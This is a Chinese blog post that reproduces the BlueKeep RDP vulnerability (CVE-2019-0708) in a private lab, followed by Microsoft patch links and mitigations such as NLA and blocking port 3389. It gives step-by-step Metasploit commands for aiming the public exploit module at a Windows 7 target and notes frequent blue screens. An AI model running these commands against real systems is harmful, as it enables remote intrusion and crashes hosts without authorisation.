前言:

2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。

准备工具:

metasploit-framework

环境准备:

   Kali              192.168.75.129  (攻击)
   Win7 sp1/x64      192.168.75.131  (被攻击)

开始复现 :

1、为了顺利复现成功,需要将被攻击机的远程桌面设为允许,防火墙也需要关掉。

需要注意的一点是,我们的靶机需要开启允许任意版本连接

2、启动MSF

msfconsole 
reload_all
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce    ##启动0708exp脚本 出现则证明成功导入rb文件

3、攻击利用

  use exploit/windows/rdp/cve_2019_0708_bluekeep_rce  ##进入模块
  show options  ##查询可选项
  set rhost  192.168.75.131    ##设置目标
  set target  2    ##设置级别 ps一开始设置target 3 vm那个,蓝屏了、设置2就没有问题了 
  exploit     ##启动攻击
目标主机出现蓝屏

奇怪的是,不管是Windows7 还是Windows Server 2008 Windows Server 2003 蓝屏次数比获取到shell的次数多了不止几倍。

修复方案:

1. 目前软件厂商微软已经发布了漏洞相应的补丁:https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019- 0708#ID0EWIAC
   Windows XP 及Windows 2003可以在以下链接下载补丁:https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708

2.   临时解决方案
    如暂时无法更新补丁,可以通过在系统上启用网络及身份认证(NLA)以暂时规避该漏洞影响。
    在企业外围防火墙阻断TCP端口3389的连接,或对相关服务器做访问来源过滤,只允许可信IP连接。
    如无明确的需求,可禁用远程桌面服务。

天渊应龙圣神大帝-道锋潜鳞

天渊应龙圣神大帝-道锋潜鳞

由道而生,消逝于道

1 条评论

头像

lrq · 2020年3月12日 上午10:11

很不错,很不错,非常的不错。
收藏了,谢谢??????

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注